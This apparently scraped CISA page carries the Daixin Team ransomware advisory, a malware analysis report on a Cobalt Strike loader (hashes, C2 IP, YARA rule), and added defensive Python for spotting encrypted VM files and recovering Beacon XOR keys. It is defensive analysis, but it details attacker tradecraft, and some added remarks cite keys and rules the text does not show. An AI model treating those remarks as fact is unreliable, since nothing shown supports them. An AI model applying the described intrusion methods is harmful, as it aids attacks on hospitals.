#StopRansomware: Daixin Team

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.

Download the PDF version of this report: pdf, 591 KB

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Cybercrime actors routinely target HPH Sector organizations with ransomware:

  • As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.
  • According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.

The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:

  • Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or
  • Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.

Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [T1190]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [T1078] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [T1598.002].

After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [T1563.001] and Remote Desktop Protocol (RDP) [T1563.002]. Daixin actors have sought to gain privileged account access through credential dumping [T1003] and pass the hash [T1550.002]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [T1098] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [T1486] on those servers. 

According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn. A ransom note is also written to /vmfs/volumes/. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. Figure 3 and Figure 4 include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”

Figure 1: Daixin Team – Ransomware Targeted File Path

Figure 2: Daixin Team – Ransomware Targeted File Extensions

Figure 3: Example 1 of Daixin Team Ransomware Note

Figure 4: Example 2 of Daixin Team Ransomware Note
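As an added example that is not part of the advisory, the script below checks a copy of a datastore tree for a cheap integrity signal a defender can verify: the .vmx and .vmsd files the locker targets are plain-text key/value files, and a .vmdk descriptor starts with a fixed header line, so any of them that no longer reads as text (or has near-ciphertext entropy) warrants an alert. The entropy threshold, the descriptor size cut-off and the sample tree are assumptions; the script builds its own constructed sample in a temporary directory rather than touching /vmfs/volumes/.

```python
import math
import os
import tempfile
from pathlib import Path

# Extensions the advisory lists as targeted by the Daixin ESXi locker under /vmfs/volumes/
TARGETED_EXTENSIONS = {".vmdk", ".vmem", ".vswp", ".vmsd", ".vmx", ".vmsn"}
# On a healthy datastore .vmx and .vmsd are plain-text key = "value" files, and a .vmdk
# descriptor (unlike a -flat/-delta extent) is a small text file with a fixed first line.
TEXT_CONFIG_EXTENSIONS = {".vmx", ".vmsd"}
VMDK_DESCRIPTOR_MAGIC = b"# Disk DescriptorFile"
DESCRIPTOR_MAX_BYTES = 64 * 1024  # assumed cut-off: descriptors are a few hundred bytes, extents are far larger
ENTROPY_THRESHOLD = 6.0           # assumed cut-off in bits/byte; ASCII config text sits near 4-5, ciphertext near 8


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, 8.0 for uniformly random bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def looks_like_text(data: bytes) -> bool:
    """True when every byte is printable ASCII or ordinary whitespace."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def inspect_file(path: Path):
    """Return a reason string if a targeted VM file no longer looks intact, else None."""
    ext = path.suffix.lower()
    if ext not in TARGETED_EXTENSIONS:
        return None
    with path.open("rb") as fh:
        head = fh.read(DESCRIPTOR_MAX_BYTES)
    if ext in TEXT_CONFIG_EXTENSIONS:
        entropy = shannon_entropy(head)
        if not looks_like_text(head) or entropy > ENTROPY_THRESHOLD:
            return f"{ext} is no longer plain text (entropy {entropy:.2f} bits/byte)"
    elif ext == ".vmdk" and path.stat().st_size <= DESCRIPTOR_MAX_BYTES:
        # A .vmdk this small must be a descriptor; an encrypted one loses its header line
        if not head.startswith(VMDK_DESCRIPTOR_MAGIC):
            return ".vmdk descriptor lacks the '# Disk DescriptorFile' header"
    return None


def scan_datastore(root: Path):
    """Walk a datastore tree and return [(path relative to root, reason)] for suspect files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = Path(dirpath) / name
            reason = inspect_file(path)
            if reason:
                findings.append((path.relative_to(root).as_posix(), reason))
    return sorted(findings)


def build_sample_datastore() -> Path:
    """Constructed stand-in for /vmfs/volumes/: one intact VM and one whose files were overwritten."""
    root = Path(tempfile.mkdtemp(prefix="vmfs-sample-"))
    healthy = root / "datastore1" / "healthy-vm"
    locked = root / "datastore1" / "locked-vm"
    healthy.mkdir(parents=True)
    locked.mkdir(parents=True)
    (healthy / "healthy-vm.vmx").write_text('.encoding = "UTF-8"\nconfig.version = "8"\nvirtualHW.version = "19"\n')
    (healthy / "healthy-vm.vmsd").write_text('snapshot.lastUID = "0"\nsnapshot.numSnapshots = "0"\n')
    (healthy / "healthy-vm.vmdk").write_bytes(VMDK_DESCRIPTOR_MAGIC + b'\nversion=1\nencoding="UTF-8"\n')
    (healthy / "healthy-vm-flat.vmdk").write_bytes(bytes(DESCRIPTOR_MAX_BYTES + 1))  # binary extent, not checked
    for name in ("locked-vm.vmx", "locked-vm.vmsd", "locked-vm.vmdk"):
        (locked / name).write_bytes(os.urandom(600))  # ciphertext stand-in for an encrypted file
    return root


if __name__ == "__main__":
    for rel_path, reason in scan_datastore(build_sample_datastore()):
        print(f"ALERT {rel_path}: {reason}")
```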

In addition to deploying ransomware, Daixin actors have exfiltrated data [TA0010] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used Ngrok—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [T1567].

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 for all referenced threat actor tactics and techniques included in this advisory.

Table 1: Daixin Actors’ ATT&CK Techniques for Enterprise

Reconnaissance
Technique Title | ID | Use
Phishing for Information: Spearphishing Attachment | T1598.002 | Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.

Initial Access
Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.
Valid Accounts | T1078 | Daixin actors use previously compromised credentials to access servers on the target network.

Persistence
Technique Title | ID | Use
Account Manipulation | T1098 | Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.

Credential Access
Technique Title | ID | Use
OS Credential Dumping | T1003 | Daixin actors have sought to gain privileged account access through credential dumping.

Lateral Movement
Technique Title | ID | Use
Remote Service Session Hijacking: SSH Hijacking | T1563.001 | Daixin actors use SSH and RDP to move laterally across a network.
Remote Service Session Hijacking: RDP Hijacking | T1563.002 | Daixin actors use RDP to move laterally across a network.
Use Alternate Authentication Material: Pass the Hash | T1550.002 | Daixin actors have sought to gain privileged account access through pass the hash.

Exfiltration
Technique Title | ID | Use
Exfiltration Over Web Service | T1567 | Daixin Team members have used Ngrok for data exfiltration over web services.

Impact
Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

INDICATORS OF COMPROMISE

See Table 2 for IOCs obtained from third-party reporting.

Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes

File | SHA256
rclone-v1.59.2-windows-amd64\git-log.txt | 9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238
rclone-v1.59.2-windows-amd64\rclone.1 | 19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD
rclone-v1.59.2-windows-amd64\rclone.exe | 54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939
rclone-v1.59.2-windows-amd64\README.html | EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF
rclone-v1.59.2-windows-amd64\README.txt | 475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28

Mitigations

FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:

  • Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).
  • Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
  • Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
  • Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.
  • Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.
  • Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TLS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.
  • Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.
  • Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.
  • Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
  • Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.

In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
    • Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
      • Refer to applicable state data breach laws and consult legal counsel when necessary.
      • For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s Health Breach Notification Rule and U.S. Department of Health and Human Services’ Breach Notification Rule for more information.
    • See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.

Mitigating and Preventing Ransomware

  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement allowlisting policies for applications and remote access that only allow systems to execute known and permitted programs.
  • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
  • Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the National Institute of Standards and Technology’s (NIST’s) Special Publication 800-63B: Digital Identity Guidelines for more information.
  • Require administrator credentials to install software.
  • Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.
  • Install and regularly update antivirus and antimalware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
  • Consider adding an email banner to messages coming from outside your organization.
  • Disable hyperlinks in received emails.

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

  • Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
  • Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
  • Follow the notification requirements as outlined in your cyber incident response plan.
  • Report incidents to the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
  • Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

REFERENCES

  • Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
  • Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
  • No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
  • Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3.
  • For additional best practices for Healthcare cybersecurity issues, see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov.

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at cisa.gov/report.

ACKNOWLEDGEMENTS

FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

Revisions

Initial Publication: October 21, 2022

CISA Adds Two Known Exploited Vulnerabilities to Catalog   

CISA has added two vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates.      

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.   

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.

CISA Releases Three Industrial Control Systems Advisories

10398871-1.v2 Zimbra October Update

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Description

CISA received a benign 32-bit Windows executable file, a malicious dynamic-link library (DLL) and an encrypted file for analysis from an organization where cyber actors exploited vulnerabilities against Zimbra Collaboration Suite (ZCS). Four CVEs are currently being leveraged against ZCS: CVE-2022-24682, CVE-2022-27924, CVE-2022-27925 chained with CVE-2022-37042, and CVE-2022-30333. The executable file is designed to side-load the malicious DLL file. The DLL is designed to load and Exclusive OR (XOR) decrypt the encrypted file. The decrypted file contains a Cobalt Strike Beacon binary. The Cobalt Strike Beacon is a malicious implant on a compromised system that calls back to the command and control (C2) server and checks for additional commands to execute on the compromised system.

For more information on cyber actors exploiting vulnerabilities in ZCS, see joint CSA: Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite.

Download the PDF version of this report: MAR-10398871-1.v2.WHITE, 372 kb

Submitted Files (3)

233bb85dbeba69231533408501697695a66b7790e751925231d64bddf80bbf91 (bin.config)

25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51 (VFTRACE.dll)

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 (vxhost.exe)

Additional Files (1)

3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e (Extracted_CobaltStrike_Beacon)

IPs (1)

207.148.76.235

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348

Tags

loader, pup

Details
Name vxhost.exe
Size 351240 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4109ac08bdc8591c7b46348eb1bca85d
SHA1 6423d1c324522bfd2b65108b554847ac4ab02479
SHA256 df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
SHA512 0605362190a9cb04a7392c7eae3ef79964a76ea68dc03dfabe6ec8f445f1c355772f2ca8166cbee73188e57bff06b74fb2cfa59869cb4461fffe1c3589856554
ssdeep 6144:BTMoU0+zvvLIpa8bo5GOc1G41vupWn2rwRGekPHZLZKA1UnmOlm:XUDvvsc80AOc1GYvAW2EGtH5ZKAKmOQ
Entropy 6.471736
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-01-05 08:22:40-05:00
Import Hash b66afb12e84aa5ce621a6635837cadba
Company Name CyberArk Software Ltd.
File Description CyberArk Viewfinity
Internal Name vf_host.exe
Legal Copyright Copyright © 1999-2016 CyberArk Software Ltd. All Rights Reserved.
Original Filename vf_host.exe
Product Name CyberArk Viewfinity
Product Version 5.5.10.101
PE Sections
MD5 Name Raw Size Entropy
3822119e846581669481aba79308c57c header 1024 2.580725
98ccfff2af4ccaa3335f63592a1fba02 .text 270848 6.543317
9dcc89a0d16e36145bb07924ca260dfe .rdata 50688 5.132125
14d493033fc147f67601753310725b2b .data 5632 3.711689
615729d1383743a91b8baf309f1a8232 .rsrc 16896 4.839559
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
df847abbfa… Used 25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51
Description

This artifact is a 32-bit executable file that has been identified as a version of vf_host.exe from Viewfinity and is benign. The file is used to side-load a DLL, vftrace.dll “058434852bb8e877069d27f452442167”.

25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51

Tags

loader, trojan

Details
Name VFTRACE.dll
Size 78336 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 058434852bb8e877069d27f452442167
SHA1 026d81090c857d894aaa18225ec4a99e419da651
SHA256 25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51
SHA512 602ad76d61e97d72d983083768eba32d3ad549ac1c763a9b39092feaef8bd4d186df18b6f91992ac8da517e86b84aaa2422da700798a65f4383ed997f52744e3
ssdeep 1536:carhs4oc7yABoxjo5p+Ocyk7P0Okmu4dJsWxcdbbZFUZAUZpw/:ndy8oxjS+Ocyk7sMzCbVFUZAULW
Entropy 6.278601
Antivirus
Adaware Gen:Variant.Bulz.429221
Avira TR/Agent.bjbhb
Bitdefender Gen:Variant.Bulz.429221
Cyren W32/ABRisk.LHKD-1052
ESET a variant of Win32/Agent.AELW trojan
Emsisoft Gen:Variant.Bulz.429221 (B)
IKARUS Trojan.Win32.Agent
K7 Trojan ( 00595a621 )
Symantec Trojan.Gen.MBT
Zillya! Trojan.Agent.Win32.2882847
YARA Rules
rule CISA_10398871_01 : trojan loader COBALTSTRIKE
{
    meta:
        Author = "CISA Code & Media Analysis"
        Incident = "10398871"
        Date = "2022-09-29"
        Last_Modified = "20221001_1200"
        Actor = "n/a"
        Category = "Trojan Loader"
        Family = "COBALTSTRIKE"
        Description = "Detects CobaltStrike Loader samples"
        MD5 = "058434852bb8e877069d27f452442167"
        SHA256 = "25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51"
    strings:
        $s1 = { 62 69 6E 2E 63 6F 6E 66 69 67 }
        $s2 = { 56 46 54 52 41 43 45 }
        $s3 = { FF 15 18 D0 00 10 }
        $s4 = { FF 15 28 D0 00 10 }
        $s5 = { 8B 55 EC 03 55 F4 0F B6 02 33 45 E4 }
    condition:
        uint16(0) == 0x5A4D and all of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2022-06-20 05:36:32-04:00
Import Hash 6677de6818bcf597d512ad4ddaea3f53
Company Name CyberArk Software Ltd.
File Description CyberArk Viewfinity
Internal Name VFTRACE.dll
Legal Copyright Copyright © 1999-2016 CyberArk Software Ltd. All Rights Reserved.
Original Filename VFTRACE.dll
Product Name CyberArk Viewfinity
Product Version 5.5.10.101
PE Sections
MD5 Name Raw Size Entropy
ef4a8b161c3676b052755f8c0bf9f3bd header 1024 2.828221
48afd9b4ef10b5f14b2c10c9581cbc2d .text 45568 6.611882
f99c54571592839d48904df07f921829 .rdata 24064 4.990721
8a5c1764d3d68e0963003dd46f3b905e .data 2560 1.834913
1e0c952d3a72e7edcda3b58acd829b6b .rsrc 1536 3.799739
41dfd851e9053a3876aa86212cd5d4a1 .reloc 3584 6.485745
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Relationships
25da610be6… Used_By df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
25da610be6… Used 233bb85dbeba69231533408501697695a66b7790e751925231d64bddf80bbf91
Description

This artifact is a malicious 32-bit DLL file loaded by “vxhost.exe” (4109ac08bdc8591c7b46348eb1bca85d). This file is designed to search for and load an encrypted file “%current directory%\bin.config” (be2b0c387642fe7e8475f5f5f0c6b90a) if present on the compromised system. It decrypts the file using the hard-coded XOR key “0x401”. The decrypted binary contains a Cobalt Strike Beacon DLL that has an embedded shellcode inside of the MZ header. It copies the Cobalt Strike Beacon DLL into a buffer and executes the shellcode.

Screenshots

Figure 1 - This screenshot illustrates code extracted from this malware where it loads and XOR decrypts the encrypted file "bin.config" (be2b0c387642fe7e8475f5f5f0c6b90a) before executing it in memory.
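The report states that the extracted shellcode decrypts its Beacon payload with the single-byte XOR key 0xC3 and that the Beacon decodes its configuration with the single-byte key 0x4f. As an added analyst-side example (not code from the report or from CISA), the Python below recovers such keys from ciphertext instead of assuming them: the payload key is the one under which an "MZ" DOS header appears at the expected offset with a valid "PE\0\0" signature behind it, and the configuration key is the one that exposes the BeaconType/Port setting headers that public Beacon config parsers document. The second YARA rule on this page tests for MZ at offset 9, so the search offset is a parameter. The sample payload and configuration are constructed stand-ins, not the real artifacts.

```python
import struct

# Single-byte keys the MAR reports for this sample: 0xC3 for the embedded Beacon payload and
# 0x4F for its configuration block. These helpers recover such a key from the ciphertext itself,
# so they also apply to a re-keyed sample.


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_pe_xor_key(blob: bytes, mz_offset: int = 0):
    """Try every single-byte key; return the one under which blob decodes to a PE image
    ("MZ" at mz_offset and "PE\\0\\0" at the e_lfanew the DOS header points to), else None."""
    for key in range(256):
        dos = xor_bytes(blob[mz_offset:mz_offset + 0x40], key)
        if len(dos) < 0x40 or dos[:2] != b"MZ":
            continue
        e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]
        sig_at = mz_offset + e_lfanew
        if xor_bytes(blob[sig_at:sig_at + 4], key) == b"PE\0\0":
            return key
    return None


# Layout of one setting in a decoded Beacon configuration, as documented by public Beacon config
# parsers: index (u16 big-endian), type (u16: 1 = short, 2 = int, 3 = data), length (u16), value.
# The block starts with setting 1 (BeaconType) as a 2-byte short, followed by setting 2 (Port).
SETTING_1_HEADER = bytes.fromhex("000100010002")
SETTING_2_HEADER = bytes.fromhex("000200010002")
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP", 8: "HTTPS", 16: "Bind TCP"}


def recover_config_xor_key(blob: bytes):
    """Return (key, offset) where xor_bytes(blob[offset:], key) starts with the BeaconType/Port headers."""
    for key in range(256):
        off = blob.find(xor_bytes(SETTING_1_HEADER, key))
        if off != -1 and xor_bytes(blob[off + 8:off + 14], key) == SETTING_2_HEADER:
            return key, off
    return None


def parse_config_settings(config: bytes) -> dict:
    """Walk decoded settings until the zero-index terminator; returns {index: value}."""
    settings, pos = {}, 0
    while pos + 6 <= len(config):
        idx, typ, length = struct.unpack_from(">HHH", config, pos)
        pos += 6
        if idx == 0:
            break
        raw = config[pos:pos + length]
        pos += length
        if typ == 1:
            settings[idx] = struct.unpack(">H", raw)[0]
        elif typ == 2:
            settings[idx] = struct.unpack(">I", raw)[0]
        else:
            settings[idx] = raw.rstrip(b"\0")
    return settings


def build_samples():
    """Constructed stand-ins (not the real artifacts): a 9-byte stub followed by a minimal PE header,
    XORed with 0xC3, and a 3-setting config (HTTPS, port 443, sleep 5000 ms) XORed with 0x4F."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE signature right after the DOS header
    pe_image = bytes(dos) + b"PE\0\0" + b"\x4c\x01" + bytes(18)
    stub = b"\xe8\x00\x00\x00\x00\x58\x90\x90\x90"       # 9 bytes, so "MZ" lands at offset 9
    encrypted_payload = xor_bytes(stub + pe_image, 0xC3)

    config = (SETTING_1_HEADER + struct.pack(">H", 8)    # BeaconType = HTTPS
              + SETTING_2_HEADER + struct.pack(">H", 443)
              + bytes.fromhex("000300020004") + struct.pack(">I", 5000)
              + bytes(6))                                 # zero index terminates the list
    encrypted_config = b"\x11\x22\x33" + xor_bytes(config, 0x4F)
    return encrypted_payload, encrypted_config


if __name__ == "__main__":
    payload, cfg = build_samples()
    key = recover_pe_xor_key(payload, mz_offset=9)
    print(f"payload key 0x{key:02X}")
    ckey, off = recover_config_xor_key(cfg)
    parsed = parse_config_settings(xor_bytes(cfg[off:], ckey))
    print(f"config key 0x{ckey:02X}: {BEACON_TYPES.get(parsed[1])} port {parsed[2]} sleep {parsed[3]} ms")
```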

3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e

Tags

trojan

Details
Name Extracted_CobaltStrike_Beacon
Size 210953 bytes
Type data
MD5 ff1d9474c2bfa9ada8d5ed3e16f0b04a
SHA1 60299a59f05b10f49f781dc073249bcb7ec27b63
SHA256 3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e
SHA512 a064097eb149f7a23df75d7575f8c30ffb83fd7ad0a00ab379c34c114827cef5ec574a1126a7f914eeed08a8c8230c796cdc5cdf111cc238fa6e9427580f9fab
ssdeep 6144:tRqu98CxD0cdRScc6stsxB4WLks1YarGR8Wjo/gj:F24hdEjWLks1YarGR85Yj
Entropy 6.968463
Antivirus
Adaware DeepScan:Generic.Exploit.Shellcode.2.8AF0A507
Bitdefender DeepScan:Generic.Exploit.Shellcode.2.8AF0A507
Emsisoft DeepScan:Generic.Exploit.Shellcode.2.8AF0A507 (B)
Trend Micro Trojan.FC904969
Trend Micro HouseCall Trojan.FC904969
YARA Rules
